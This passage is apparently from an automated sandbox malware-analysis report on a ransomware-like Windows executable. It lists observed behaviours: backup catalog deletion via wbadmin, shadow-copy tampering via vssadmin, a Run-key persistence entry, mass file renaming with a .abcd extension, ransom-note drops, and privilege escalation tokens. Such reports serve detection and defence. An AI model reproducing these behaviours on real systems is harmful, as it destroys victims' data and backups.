| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\"" | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\Blog.dotx.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-150_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-400_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\Snooze.scale-80.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\networkmanifest.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-ul-oob.xrm-ms.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-64_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\rename.svg.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Latn-RS.pak.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ppd.xrm-ms.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-US\en-US_female_TTS\ruleset_en-US_TTS.lua | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\UnifiedShare.aapp.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\es-MX\View3d\3DViewerProductDescription-universal.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\Microsoft.NETCore.App.deps.json | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\MixerBranding\mixer_logo.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforcomments.svg | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\fonts\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-400_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_OEM_Perp-ul-phn.xrm-ms.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\lib\orb.idl | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_KMS_Client-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\MicrosoftAccount.scale-140.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-30_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-40_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-100.png.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Call_Ringing_Long.m4a | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-white_scale-100.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
